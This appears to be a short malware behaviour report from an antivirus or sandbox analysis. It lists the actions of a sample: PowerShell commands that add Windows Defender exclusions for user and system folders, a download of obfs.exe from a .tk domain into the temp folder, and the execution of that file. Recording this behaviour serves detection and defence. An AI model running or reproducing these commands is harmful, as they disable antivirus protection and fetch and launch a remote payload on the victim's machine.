Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%HOMEPATH%'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%WINDIR%'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%APPDATA%'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'
- https://thehairtransplantationturkey.tk/obfs.exe as %temp%\obfs
- DNS ASK th#######ansplantationturkey.tk
- '<SYSTEM32>\cmd.exe' /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell -Command Add-MpPreference -ExclusionPath...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\obfs'